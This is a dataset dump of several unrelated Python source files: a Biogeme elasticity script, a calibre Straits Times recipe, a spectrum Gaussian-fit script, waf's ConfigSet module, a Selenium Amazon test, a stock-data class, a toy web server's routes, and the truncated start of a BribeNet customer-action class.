investigate a scenario where the distance increases by one kilometer.\ndelta_dist = 1.0\ndistance_km_scaled_after = (distance_km + delta_dist) / 5\n\n# Utility of the slow mode whem the distance increases by 1 kilometer.\nV_SM_after = (\n ASC_SM\n + BETA_DIST_MALE * distance_km_scaled_after * male\n + BETA_DIST_FEMALE * distance_km_scaled_after * female\n + BETA_DIST_UNREPORTED * distance_km_scaled_after * unreportedGender\n)\n\n# Associate utility functions with the numbering of alternatives\nV_after = {0: V_PT, 1: V_CAR, 2: V_SM_after}\n\n# Definition of the nests:\n# 1: nests parameter\n# 2: list of alternatives\n\nprob_sm_after = models.nested(V_after, None, nests, 2)\n\ndirect_elas_sm_dist = (\n (prob_sm_after - prob_sm) * distance_km / (prob_sm * delta_dist)\n)\n\nsimulate = {\n 'weight': normalizedWeight,\n 'Prob. slow modes': prob_sm,\n 'direct_elas_sm_dist': direct_elas_sm_dist,\n}\n\nbiogeme = bio.BIOGEME(database, simulate)\nbiogeme.modelName = '05nestedElasticitiesConfidenceIntervals'\n\n# Read the estimation results from the file\nresults = res.bioResults(pickleFile='01nestedEstimation.pickle')\n\n# simulatedValues is a Panda dataframe with the same number of rows as\n# the database, and as many columns as formulas to\n# simulate.\nsimulatedValues = biogeme.simulate(results.getBetaValues())\n\n# We calculate the elasticities\n\nsimulatedValues['Weighted prob. slow modes'] = (\n simulatedValues['weight'] * simulatedValues['Prob. slow modes']\n)\n\ndenominator_sm = simulatedValues['Weighted prob. slow modes'].sum()\n\ndirect_elas_sm_dist = (\n simulatedValues['Weighted prob. slow modes']\n * simulatedValues['direct_elas_sm_dist']\n / denominator_sm\n).sum()\nprint(\n f'Aggregate direct arc elasticity of slow modes wrt distance: '\n f'{direct_elas_sm_dist:.7f}'\n)\n\nprint('Calculating confidence interval...')\n\n# Calculate confidence intervals\nb = results.getBetasForSensitivityAnalysis(biogeme.freeBetaNames, size=100)\n\n# Returns data frame containing, for each simulated value, the left\n# and right bounds of the confidence interval calculated by\n# simulation.\nleft, right = biogeme.confidenceIntervals(b, 0.9)\n\nleft['Weighted prob. slow modes'] = left['weight'] * left['Prob. slow modes']\nright['Weighted prob. slow modes'] = (\n right['weight'] * right['Prob. slow modes']\n)\ndenominator_left = left['Weighted prob. slow modes'].sum()\ndenominator_right = right['Weighted prob. slow modes'].sum()\n\n# Build an interval object for the denominator\ndenominator_interval = ia.interval[(denominator_left, denominator_right)]\n\n# Build a list of interval objects, one for each disaggregate elasticity\nelas_interval = [\n ia.interval([l, r])\n for l, r in zip(left['direct_elas_sm_dist'], right['direct_elas_sm_dist'])\n]\n\n# Build a list of interval objects, one for each term of the numerator\nnumerator_interval = [\n ia.interval([l, r])\n for l, r in zip(\n left['Weighted prob. slow modes'], right['Weighted prob. slow modes']\n )\n]\n\n# Build a list of interval objects, one for each term of the sum\nterms_of_the_sum_interval = [\n e * wp / denominator_interval\n for e, wp in zip(elas_interval, numerator_interval)\n]\n\n# The interval package apparently does not provide a tool to sum a\n# list of intervals. We do it manually. Note that the object interval\n# contains a list of ranges (to allow the modeling of disconnected\n# intervals). The first of these ranges is x[0], and we access the inf\n# and sup values of this range.\nsum_interval_left = sum(x[0].inf for x in terms_of_the_sum_interval)\nsum_interval_right = sum(x[0].sup for x in terms_of_the_sum_interval)\n\nprint(f'[{sum_interval_left},{sum_interval_right}]')\n","sub_path":"examples/indicators/05nestedElasticitiesConfidenceIntervals.py","file_name":"05nestedElasticitiesConfidenceIntervals.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"270444202","text":"\r\n__license__ = 'GPL v3'\r\n__copyright__ = ''\r\n'''\r\nwww.straitstimes.com\r\n'''\r\n\r\nimport re\r\nfrom calibre.web.feeds.recipes import BasicNewsRecipe\r\n\r\n\r\nclass StraitsTimes(BasicNewsRecipe):\r\n title = 'The Straits Times'\r\n __author__ = ''\r\n description = 'Singapore newspaper'\r\n oldest_article = 2\r\n max_articles_per_feed = 100\r\n no_stylesheets = True\r\n use_embedded_content = False\r\n encoding = 'utf-8'\r\n publisher = 'Singapore Press Holdings Ltd.'\r\n category = 'news, politics, singapore, asia'\r\n language = 'en_SG'\r\n\r\n conversion_options = {\r\n 'comments': description, 'tags': category, 'language': language, 'publisher': publisher\r\n }\r\n\r\n preprocess_regexps = [\r\n (re.compile(\r\n r'',\r\n re.IGNORECASE | re.DOTALL),\r\n lambda m:''),\r\n (re.compile(r'', re.IGNORECASE | re.DOTALL),\r\n lambda m: ''),\r\n ]\r\n \r\n headline_reg_exp = 'headline node-title' # Headline\r\n img_reg_exp = 'image' \t\t # Main Image\r\n body_reg_exp = 'odd\\sfield-item' # Article Body\r\n subheadline_reg_exp = 'node-subheadline' # Sub-headline\r\n related_reg_exp = '^.*related_story.*$' # Related Stories\r\n\r\n keep_only_tags = [\r\n dict(name='h1', attrs={'class': re.compile(headline_reg_exp, re.IGNORECASE)}) \r\n ,dict(name='figure', attrs={'itemprop': re.compile(img_reg_exp, re.IGNORECASE)})\r\n ,dict(name='div', attrs={'class': 'story-postdate'}) # Publish time\r\n ,dict(name='h2', attrs={'class': re.compile(subheadline_reg_exp, re.IGNORECASE)})\r\n ,dict(name='div', attrs={'class': re.compile(body_reg_exp, re.IGNORECASE)}) # Article Body\r\n \r\n ]\r\n \r\n remove_tags = [\r\n dict(name='div', attrs={'class': re.compile(related_reg_exp, re.IGNORECASE)})\r\n ]\r\n \r\n remove_tags_after = dict(name='div', attrs={'class': 'hr_thin'})\r\n \r\n\r\n feeds = [\r\n (u'Top of the News' , u'http://www.straitstimes.com/print/top-of-the-news/rss.xml')\r\n ,(u'World' , u'http://www.straitstimes.com/print/world/rss.xml')\r\n ,(u'Home' , u'http://www.straitstimes.com/print/home/rss.xml')\r\n ,(u'Business' , u'http://www.straitstimes.com/print/business/rss.xml')\r\n ,(u'Invest' , u'http://www.straitstimes.com/print/invest/rss.xml')\r\n ,(u'Life' , u'http://www.straitstimes.com/print/life/rss.xml')\r\n ,(u'Digital' , u'http://www.straitstimes.com/print/digital/rss.xml')\r\n ,(u'Opinion' , u'http://www.straitstimes.com/print/opinion/rss.xml')\r\n ,(u'Forum' , u'http://www.straitstimes.com/print/forum/rss.xml')\r\n ,(u'Big Picture' , u'http://www.straitstimes.com/print/big-picture/rss.xml')\r\n ,(u'Insight' , u'http://www.straitstimes.com/print/insight/rss.xml')\r\n ,(u'Science' , u'http://www.straitstimes.com/print/science/rss.xml')\r\n ,(u'Education' , u'http://www.straitstimes.com/print/education/rss.xml')\r\n ,(u'Mind & Body' , u'http://www.straitstimes.com/print/mind-body/rss.xml')\r\n ,(u'Community' , u'http://www.straitstimes.com/print/community/rss.xml')\r\n ,(u'Sport' , u'http://www.straitstimes.com/print/sport/rss.xml')\r\n \r\n\r\n ]\r\n\r\n def preprocess_html(self, soup):\r\n for img in soup.findAll('img', srcset=True):\r\n img['src'] = img['srcset'].partition(' ')[0]\r\n img['srcset'] = ''\r\n return soup\r\n\r\n\r\n","sub_path":"straits_times.py","file_name":"straits_times.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501638532","text":"\nfrom inspect import Parameter\nimport matplotlib.mlab as mlab\nfrom re import error\nfrom matplotlib import patches\n# from matplotlib.pyplot import plt\nimport pylab as plt\nfrom numpy import array\nimport numpy as np\nimport pylab as pl\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import norm\n\n\noriPath = \"Task1-samples\\\\Task1-ReleaseV1.0\\\\energy_2020-09-30.csv\"\nglobal max_value,nomrmal\nmax_value = 40000\nnormal = 511\nglobal gx_rate,gy_rate\n# gx_rate = 1\n# gy_rate = 1\ngx_rate = 100\ngy_rate = 1600\n\n\ndef get_data(lines):\n '''\n 读取数据\n '''\n sizeArry = []\n for line in lines:\n line = line.replace('\\n',\"\")\n line = line.replace(',','')\n line = int(float(line))\n sizeArry.append(line)\n return array(sizeArry)\n\ndef gaussian(data):\n\n x = np.array(data) \n mu =np.mean(x) #计算均值 \n sigma =np.std(x) \n num_bins = 30 #直方图柱子的数量 \n n, bins, patches = plt.hist(x, num_bins,density=1, alpha=0.75) \n #直方图函数,x为x轴的值,normed=1表示为概率密度,即和为一,绿色方块,色深参数0.5.返回n个概率,直方块左边线的x值,及各个方块对象 \n y = norm.pdf(bins, mu, sigma)#拟合一条最佳正态分布曲线y \n\n plt.grid(True)\n plt.plot(bins, y, 'r--') #绘制y的曲线 \n plt.xlabel('values') #绘制x轴 \n plt.ylabel('Probability') #绘制y轴 \n plt.title('Histogram : $\\mu$=' + str(round(mu,2)) + ' $\\sigma=$'+str(round(sigma,2))) #中文标题 u'xxx' \n #plt.subplots_adjust(left=0.15)#左边距 \n\ndef gaussian_singletrue(x,*param):\n '''\n 真实事件的高斯峰\n '''\n return param[1]*np.exp(-np.power(x - param[3], 2.) / (2 * np.power(param[5], 2.)))\n\ndef gaussian_1(x,*param):\n return param[0]*np.exp(-np.power(x - param[2], 2.) / (2 * np.power(param[4], 2.)))\n\ndef gaussian_2(x,*param):\n '''二元高斯函数拟合过程\n\n '''\n return param[0]*np.exp(-np.power(x - param[2], 2.) / (2 * np.power(param[4], 2.)))+\\\n param[1]*np.exp(-np.power(x - param[3], 2.) / (2 * np.power(param[5], 2.)))\n\ndef gaussian_3(x,a1,a2,a3,m1,m2,m3,s1,s2,s3): # 三元高斯拟合函数 \n \n return a1*np.exp(-((x-m1)/s1)**2)+a2*np.exp(-((x-m2)/s2)**2)+a3*np.exp(-((x-m3)/s3)**2)\n\ndef draw_hist(lenths):\n\n # 绘制直方图\n bins1 = np.linspace(min(lenths),max(lenths),200)\n pl.figure(\"能谱直方图\")\n n1, bins1, patches1 = pl.hist(lenths,bins1)\n pl.xlabel('Energy')\n pl.ylabel('Counts')\n pl.title('Energy spectrum histogram')\n\n\n # 能谱归一化\n n12 = n1.tolist()\n frequent_index = n12.index(max(n12)) \n data = lenths*511/(0.5*(bins1[frequent_index]+bins1[frequent_index+1]))\n bins2 = np.linspace(min(data),max(data),200)\n pl.figure(\"归一化能谱直方图\")\n n2, bins2, patches2 = pl.hist(data,bins2)\n pl.xlabel('Energy')\n pl.ylabel('Counts')\n pl.title('Normalized energy spectrum histogram')\n\n\n\n\n # 绘制高斯拟合图\n # bins比n多一个数\n # bins = np.delete(bins,-1) # 方法一:去除列表最后面的一个数\n guass_x = []\n guass_x = np.array(guass_x)\n guass_y = n2\n for i in range(len(bins2)-1): #方法二:bins需要取矩形两端端点的均值\n temp = 0.5*(bins2[i]+bins2[i+1])\n guass_x = np.append(guass_x,temp)\n popt,pcov = curve_fit(gaussian_2,guass_x/gx_rate,guass_y/gy_rate,p0=[3,4,3,6,1,1],maxfev = 140000)\n\n plt.figure(\"高斯拟合图\")\n plt.plot(guass_x,guass_y,'b*:',label='data')\n plt.plot(guass_x,gaussian_2(guass_x/gx_rate,*popt)*gy_rate,'r',label='fit')\n plt.legend()\n plt.show()\n print(\"高斯拟合的参数:\",*popt)\n\n # 计算能量分辨率\n \n \n\n # 循环计算列表横坐标中的拟合值是否等于半高度\n '''\n global half_h_w1, half_h_w2,E_max\n half_h_w1, half_h_w2 = 0,0\n for x in x_point: \n if(x<256&int(gaussian_2(x,*popt))==int(0.5*high)):\n half_h_w1 = x\n if(x>256&int(gaussian_2(x,*popt))==int(0.5*high)):\n half_h_w2 = x\n E_max = 0\n if(int(gaussian_2(x,*popt)>E_max)):\n E_max = x\n half_h_w = half_h_w2-half_h_w1\n '''\n\n # 将大于半高度的横坐标保存下来,并追加列表,计算列表中首尾两项的差值\n '''双峰融合版\n global half_h_w_list\n half_h_w_list = []\n high = max(gaussian_2(guass_x/gx_rate,*popt)*gy_rate)\n for x in guass_x: \n if(int(gaussian_2(x/gx_rate,*popt)*gy_rate)>int(0.5*high)):\n half_h_w_list = np.append(half_h_w_list,x)\n E_max = 511\n \n half_h_w = max(half_h_w_list)-min(half_h_w_list)\n eta = half_h_w/E_max\n print(\"能量分辨率为:\",eta)\n '''\n global half_h_w_list\n half_h_w_list = []\n high = max(gaussian_singletrue(guass_x/gx_rate,*popt)*gy_rate)\n for x in guass_x: \n if(int(gaussian_singletrue(x/gx_rate,*popt)*gy_rate)>int(0.5*high)):\n half_h_w_list = np.append(half_h_w_list,x)\n E_max = 511\n \n half_h_w = max(half_h_w_list)-min(half_h_w_list)\n eta = half_h_w/E_max\n print(\"能量分辨率为:\",eta)\n \n ''' \n high = max(gaussian_2(guass_x,*popt))\n \n for x in x_point:\n ''' \n \n\n \n# 首先打开文件从文件中读取数据\nf = open(oriPath,encoding=\"utf-8\")\nLenths = get_data(f.readlines()) \ndraw_hist(Lenths)\n\n\n","sub_path":"Task1-samples/Task1-ReleaseV1.0/gaussian_hist_xls.py","file_name":"gaussian_hist_xls.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68333241","text":"#!/usr/bin/env python\n# Thomas Nagy, 2005-2018 (ita)\n\"\"\"\n\nConfigSet: a special dict\n\nThe values put in :py:class:`ConfigSet` must be serializable (dicts, lists, strings)\n\"\"\"\nimport copy\nimport os\nimport re\n\nfrom waflib import Logs\nfrom waflib import Utils\n\nre_imp = re.compile(r\"^(#)*?([^#=]*?)\\ =\\ (.*?)$\", re.M)\n\n\nclass ConfigSet:\n \"\"\"\n A copy-on-write dict with human-readable serialized format. The serialization format\n is human-readable (python-like) and performed by using eval() and repr().\n For high performance prefer pickle. Do not store functions as they are not serializable.\n\n The values can be accessed by attributes or by keys::\n\n from waflib.ConfigSet import ConfigSet\n env = ConfigSet()\n env.FOO = 'test'\n env['FOO'] = 'test'\n \"\"\"\n\n __slots__ = (\"table\", \"parent\")\n\n def __init__(self, filename=None):\n self.table = {}\n \"\"\"\n\t\tInternal dict holding the object values\n\t\t\"\"\"\n # self.parent = None\n\n if filename:\n self.load(filename)\n\n def __contains__(self, key):\n \"\"\"\n Enables the *in* syntax::\n\n if 'foo' in env:\n print(env['foo'])\n \"\"\"\n if key in self.table:\n return True\n try:\n return self.parent.__contains__(key)\n except AttributeError:\n return False # parent may not exist\n\n def keys(self):\n \"\"\"Dict interface\"\"\"\n keys = set()\n cur = self\n while cur:\n keys.update(cur.table.keys())\n cur = getattr(cur, \"parent\", None)\n keys = list(keys)\n keys.sort()\n return keys\n\n def __iter__(self):\n return iter(self.keys())\n\n def __str__(self):\n \"\"\"Text representation of the ConfigSet (for debugging purposes)\"\"\"\n return \"\\n\".join(\n [\"{!r} {!r}\".format(x, self.__getitem__(x)) for x in self.keys()]\n )\n\n def __getitem__(self, key):\n \"\"\"\n Dictionary interface: get value from key::\n\n def configure(conf):\n conf.env['foo'] = {}\n print(env['foo'])\n \"\"\"\n try:\n while 1:\n x = self.table.get(key)\n if not x is None:\n return x\n self = self.parent\n except AttributeError:\n return []\n\n def __setitem__(self, key, value):\n \"\"\"\n Dictionary interface: set value from key\n \"\"\"\n self.table[key] = value\n\n def __delitem__(self, key):\n \"\"\"\n Dictionary interface: mark the value as missing\n \"\"\"\n self[key] = []\n\n def __getattr__(self, name):\n \"\"\"\n Attribute access provided for convenience. The following forms are equivalent::\n\n def configure(conf):\n conf.env.value\n conf.env['value']\n \"\"\"\n if name in self.__slots__:\n return object.__getattribute__(self, name)\n else:\n return self[name]\n\n def __setattr__(self, name, value):\n \"\"\"\n Attribute access provided for convenience. The following forms are equivalent::\n\n def configure(conf):\n conf.env.value = x\n env['value'] = x\n \"\"\"\n if name in self.__slots__:\n object.__setattr__(self, name, value)\n else:\n self[name] = value\n\n def __delattr__(self, name):\n \"\"\"\n Attribute access provided for convenience. The following forms are equivalent::\n\n def configure(conf):\n del env.value\n del env['value']\n \"\"\"\n if name in self.__slots__:\n object.__delattr__(self, name)\n else:\n del self[name]\n\n def derive(self):\n \"\"\"\n Returns a new ConfigSet deriving from self. The copy returned\n will be a shallow copy::\n\n from waflib.ConfigSet import ConfigSet\n env = ConfigSet()\n env.append_value('CFLAGS', ['-O2'])\n child = env.derive()\n child.CFLAGS.append('test') # warning! this will modify 'env'\n child.CFLAGS = ['-O3'] # new list, ok\n child.append_value('CFLAGS', ['-O3']) # ok\n\n Use :py:func:`ConfigSet.detach` to detach the child from the parent.\n \"\"\"\n newenv = ConfigSet()\n newenv.parent = self\n return newenv\n\n def detach(self):\n \"\"\"\n Detaches this instance from its parent (if present)\n\n Modifying the parent :py:class:`ConfigSet` will not change the current object\n Modifying this :py:class:`ConfigSet` will not modify the parent one.\n \"\"\"\n tbl = self.get_merged_dict()\n try:\n delattr(self, \"parent\")\n except AttributeError:\n pass\n else:\n keys = tbl.keys()\n for x in keys:\n tbl[x] = copy.deepcopy(tbl[x])\n self.table = tbl\n return self\n\n def get_flat(self, key):\n \"\"\"\n Returns a value as a string. If the input is a list, the value returned is space-separated.\n\n :param key: key to use\n :type key: string\n \"\"\"\n s = self[key]\n if isinstance(s, str):\n return s\n return \" \".join(s)\n\n def _get_list_value_for_modification(self, key):\n \"\"\"\n Returns a list value for further modification.\n\n The list may be modified inplace and there is no need to do this afterwards::\n\n self.table[var] = value\n \"\"\"\n try:\n value = self.table[key]\n except KeyError:\n try:\n value = self.parent[key]\n except AttributeError:\n value = []\n else:\n if isinstance(value, list):\n # force a copy\n value = value[:]\n else:\n value = [value]\n self.table[key] = value\n else:\n if not isinstance(value, list):\n self.table[key] = value = [value]\n return value\n\n def append_value(self, var, val):\n \"\"\"\n Appends a value to the specified config key::\n\n def build(bld):\n bld.env.append_value('CFLAGS', ['-O2'])\n\n The value must be a list or a tuple\n \"\"\"\n if isinstance(\n val, str\n ): # if there were string everywhere we could optimize this\n val = [val]\n current_value = self._get_list_value_for_modification(var)\n current_value.extend(val)\n\n def prepend_value(self, var, val):\n \"\"\"\n Prepends a value to the specified item::\n\n def configure(conf):\n conf.env.prepend_value('CFLAGS', ['-O2'])\n\n The value must be a list or a tuple\n \"\"\"\n if isinstance(val, str):\n val = [val]\n self.table[var] = val + self._get_list_value_for_modification(var)\n\n def append_unique(self, var, val):\n \"\"\"\n Appends a value to the specified item only if it's not already present::\n\n def build(bld):\n bld.env.append_unique('CFLAGS', ['-O2', '-g'])\n\n The value must be a list or a tuple\n \"\"\"\n if isinstance(val, str):\n val = [val]\n current_value = self._get_list_value_for_modification(var)\n\n for x in val:\n if x not in current_value:\n current_value.append(x)\n\n def get_merged_dict(self):\n \"\"\"\n Computes the merged dictionary from the fusion of self and all its parent\n\n :rtype: a ConfigSet object\n \"\"\"\n table_list = []\n env = self\n while 1:\n table_list.insert(0, env.table)\n try:\n env = env.parent\n except AttributeError:\n break\n merged_table = {}\n for table in table_list:\n merged_table.update(table)\n return merged_table\n\n def store(self, filename):\n \"\"\"\n Serializes the :py:class:`ConfigSet` data to a file. See :py:meth:`ConfigSet.load` for reading such files.\n\n :param filename: file to use\n :type filename: string\n \"\"\"\n try:\n os.makedirs(os.path.split(filename)[0])\n except OSError:\n pass\n\n buf = []\n merged_table = self.get_merged_dict()\n keys = list(merged_table.keys())\n keys.sort()\n\n try:\n fun = ascii\n except NameError:\n fun = repr\n\n for k in keys:\n if k != \"undo_stack\":\n buf.append(\"{} = {}\\n\".format(k, fun(merged_table[k])))\n Utils.writef(filename, \"\".join(buf))\n\n def load(self, filename):\n \"\"\"\n Restores contents from a file (current values are not cleared). Files are written using :py:meth:`ConfigSet.store`.\n\n :param filename: file to use\n :type filename: string\n \"\"\"\n tbl = self.table\n code = Utils.readf(filename, m=\"rU\")\n for m in re_imp.finditer(code):\n g = m.group\n tbl[g(2)] = eval(g(3))\n Logs.debug(\"env: %s\", self.table)\n\n def update(self, d):\n \"\"\"\n Dictionary interface: replace values with the ones from another dict\n\n :param d: object to use the value from\n :type d: dict-like object\n \"\"\"\n self.table.update(d)\n\n def stash(self):\n \"\"\"\n Stores the object state to provide transactionality semantics::\n\n env = ConfigSet()\n env.stash()\n try:\n env.append_value('CFLAGS', '-O3')\n call_some_method(env)\n finally:\n env.revert()\n\n The history is kept in a stack, and is lost during the serialization by :py:meth:`ConfigSet.store`\n \"\"\"\n orig = self.table\n tbl = self.table = self.table.copy()\n for x in tbl.keys():\n tbl[x] = copy.deepcopy(tbl[x])\n self.undo_stack = self.undo_stack + [orig]\n\n def commit(self):\n \"\"\"\n Commits transactional changes. See :py:meth:`ConfigSet.stash`\n \"\"\"\n self.undo_stack.pop(-1)\n\n def revert(self):\n \"\"\"\n Reverts the object to a previous state. See :py:meth:`ConfigSet.stash`\n \"\"\"\n self.table = self.undo_stack.pop(-1)\n","sub_path":"docs/.mywaflib/waflib/ConfigSet.py","file_name":"ConfigSet.py","file_ext":"py","file_size_in_byte":10597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332412317","text":"\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n# init driver\ndriver = webdriver.Chrome(executable_path='/Users/mun/python-selenium-automation/chromedriver_auto')\ndriver.maximize_window()\ndriver.implicitly_wait(5)\n\ndriver.get('https://www.amazon.com/')\nsearch_field=driver.find_element(By. ID,'twotabsearchtextbox').send_keys('Table')\n\nsearch_icon=driver.find_element(By.ID,'nav-search-submit-button')\nsearch_icon.click()\n\ndriver.find_element(By.XPATH, \"//span[@class='a-color-state a-text-bold']\").text\nactual_result=driver.find_element (By.XPATH, \"//span[@class='a-color-state a-text-bold']\").text\nexpected_result= '\"Table\"'\nassert expected_result == actual_result, f'Excepcted {expected_result}, but got {actual_result}'\n","sub_path":"amazon_script.py","file_name":"amazon_script.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"189171448","text":"class learningData(object):\r\n ''' The object of data. This object will be composed\r\n from an array of stocks and dates. It will consist\r\n of both input data (xs) and output data (ys). '''\r\n def __init__(self):\r\n ''' The data is originally two empty array. The first array will be\r\n two dimensional input array called x that is m x n. The second\r\n array called y is the output array that is m x 1. The number of\r\n stocks is denoted by m and the number of dates used for learning\r\n is denoted by n. All notation is to be consistant with the\r\n Coursera Machine Learning course as much as possible.'''\r\n self.X = []\r\n self.y = []\r\n self.m = 0\r\n self.n = 0\r\n\r\n def construct(self, stocks, dates):\r\n ''' This method constructs the data arrays. The inputs are an array\r\n of m stocks and an array of dates. The first element of dates\r\n is a character string to tell the referenced date such as\r\n '1/1/1980'. The second element is an array of n-1 integers\r\n telling the trading days to use to populate the input array.\r\n The final value is the integer value of the future date.\r\n An input value of ['1/1/1980',[50, 100, 150], 50] means\r\n we are using '1/1/1980' as our reference date along with the\r\n dates 50 trading days, 100 trading days and 150 trading days\r\n in the past for a total of 4 input values i.e. n = 4. From\r\n these values we are looking to anticipate the stock value\r\n 50 days in the future. \r\n\r\n The value of m for the data is expected to be m but not all stocks\r\n go back as far in time. If 1/1/1980 is the reference date and\r\n gs only went public in 1999 this stock will be left out of the\r\n Data object.\r\n\r\n '''\r\n self.n = len(dates[1]) + 1\r\n self.m = 0\r\n from stock import Stock\r\n from read_stock import convert_date\r\n referenceDate = convert_date(dates[0])\r\n num_stocks = len(stocks)\r\n print (referenceDate)\r\n self.m = 0\r\n for i in range(0, num_stocks):\r\n elements = len(stocks[i].dates) # This is the number of entries in stocks\r\n firstDayAvailable = stocks[i].dates[elements-1]\r\n firstDayNeeded = referenceDate - max(dates[1]) # How far back I need to go\r\n if (firstDayNeeded > firstDayAvailable): \r\n self.m += 1\r\n # Find index of referenceDate. refererenceDate might not be a trading\r\n # day in which case we will start with index of first trading day\r\n # after referenceDay\r\n iDay = 0\r\n while (stocks[i].dates[iDay] >= referenceDate):\r\n iDay += 1\r\n if (stocks[i].dates[iDay] < referenceDate):\r\n iDay -= 1\r\n stockDays = []\r\n stockDays.append(iDay)\r\n # Construct an array of indicies of values to constuct from\r\n for iMark in range(0, len(dates[1])):\r\n stockDays.append(iDay + dates[1][iMark])\r\n # Now go through array of indicies and get the trading values of those days\r\n tempValues = []\r\n referenceValue = stocks[i].values[iDay] # All values for this stock are divided by this\r\n for iMark in range(0, len(stockDays)):\r\n # divide stock value by value on reference date \r\n adjustedValue = stocks[i].values[stockDays[iMark]]/referenceValue\r\n tempValues.append(adjustedValue)\r\n self.X.append(tempValues)\r\n # Now get the future value and append it to self.y\r\n futureDay = iDay - dates[2]\r\n adjustedValue = stocks[i].values[futureDay]/referenceValue\r\n self.y.append(adjustedValue)\r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"learningData.py","file_name":"learningData.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21864824","text":"# coding: utf-8\nimport random\n\nfrom web004.models import User, Message\nfrom web004.util import log\n\n\ndef template(name):\n path = 'templates/' + name\n with open(path, 'r', encoding='utf-8') as f:\n r = f.read()\n return r\n\n\ndef random_str():\n # 生成随机的字符\n seed = 'asdfjqeruoprtkjgfddzxcvnnmlpoidjiruqdfjjka'\n s = ''\n for i in range(16):\n index = random.randint(1, len(seed) - 1)\n s += seed[index]\n return s\n\n\ndef current_user(request):\n # cookies = request.cookies\n # session_id = cookies['user']\n # username = session[session_id]\n # return username\n session_id = request.cookies.get('user', '')\n username = session.get(session_id, '【游客】')\n return username\n\n\ndef response_with_header(headers, code=200):\n header_dict = {\n 200: 'HTTP/1.1 200 OK\\r\\n',\n 301: 'HTTP/1.1 301 Permanently Moved\\r\\n',\n 302: 'HTTP/1.1 302 Temporarily Moved\\r\\n',\n }\n header = header_dict[code]\n # 这样写的原因是''.join()要比字符串的拼接效率高\n # for k, v in headers:\n # header += '{}: {}\\r\\n'.format(k, v)\n header += ''.join(['{}: {}\\r\\n'.format(k, v) for k, v in headers.items()])\n return header\n\n\ndef route_static(request):\n filename = request.query.get('file', 'doge.gif')\n path = 'static/' + filename\n # with open(path, 'rb', encoding='utf-8') as f:\n # ValueError: binary mode doesn't take an encoding argument\n # 二进制数据不应该指定编码格式\n with open(path, 'rb') as f:\n body = f.read()\n log('图片:', body)\n header = b'HTTP/1.1 200 OK\\r\\nContent: image/gif\\r\\n'\n r = header + b'\\r\\n' + body\n return r\n\n\ndef route_index(request):\n header_dict = {\n 'Content-Type': 'text/html'\n }\n headers = response_with_header(header_dict)\n body = template('example.html')\n username = current_user(request)\n body = body.replace('{{username}}', username)\n r = headers + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_register(request):\n header_dict = {\n 'Content-Type': 'text/html'\n }\n headers = response_with_header(header_dict)\n if request.method == 'POST':\n form = request.form()\n user = User.new(form)\n if user.validate_register():\n result = '注册成功!'\n user.save()\n else:\n result = '用户名或者密码小于等于2位'\n else:\n result = ''\n body = template('register.html')\n body = body.replace('{{result}}', result)\n r = headers + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_login(request):\n header_dict = {\n 'Content-Type': 'text/html'\n }\n if request.method == 'POST':\n form = request.form()\n user = User.new(form)\n if user.validate_login():\n result = '登陆成功!'\n # 设置session和cookie\n session_id = random_str()\n session[session_id] = user.username\n header_dict['Set-Cookie'] = 'user={}'.format(session_id)\n\n else:\n result = '用户名错误或密码错误!'\n else:\n result = ''\n username = current_user(request)\n body = template('login.html')\n body = body.replace('{{username}}', username)\n body = body.replace('{{result}}', result)\n headers = response_with_header(header_dict)\n r = headers + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\nmessage_list = []\nsession = {}\n\n\ndef route_messages(request):\n header_dict = {\n 'Content-Type': 'text/html'\n }\n headers = response_with_header(header_dict)\n if request.method == 'POST':\n form = request.form()\n message = Message.new(form)\n message.save()\n message_list.append(message)\n msg = '\\n'.join([str(m) for m in message_list])\n body = template('html_basic.html')\n log('message', msg)\n body = body.replace('{{messages}}', msg)\n log('替代后:', body)\n r = headers + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_profile(request):\n header_dict = {\n 'Content-Type': 'text/html'\n }\n headers = response_with_header(header_dict)\n body = template('profile.html')\n username = current_user(request)\n if username == '【游客】':\n header_dict['Location'] = 'http://localhost:3000/login'\n headers = response_with_header(header_dict, 302)\n else:\n user = User.find_by(username=username)\n body = body.replace('{{username}}', user.username)\n body = body.replace('{{id}}', str(user.id))\n body = body.replace('{{note}}', user.note)\n\n r = headers + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\nroute_dict = {\n '/': route_index,\n '/register': route_register,\n '/login': route_login,\n '/messages': route_messages,\n '/profile': route_profile,\n}\n","sub_path":"web004/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584547647","text":"from typing import Dict, Any, Tuple, List\n\nimport numpy as np\n\nfrom BribeNet.bribery.temporal.action.briberyAction import BriberyAction\nfrom BribeNet.bribery.temporal.briber import GraphNotSubclassOfTemporalRatingGraphException\nfrom BribeNet.graph.temporal.action.actionType import ActionType\nfrom BribeNet.helpers.bribeNetException import BribeNetException\n\n\nclass CustomerActionExecutedMultipleTimesException(BribeNetException):\n pass\n\n\nclass CustomerActionTimeNotCorrectException(BribeNetException):\n pass\n\n\nclass CustomerAction(object):\n\n def __init__(self, graph):\n from BribeNet.graph.temporal.ratingGraph import TemporalRatingGraph # local import to remove cyclic dependency\n if not issubclass(graph.__class__, TemporalRatingGraph):\n raise GraphNotSubclassOfTemporalRatingGraphException(f\"{graph.__class__.__name__} is not a subclass of \"\n \"TemporalRatingGraph\")\n self.graph = graph\n 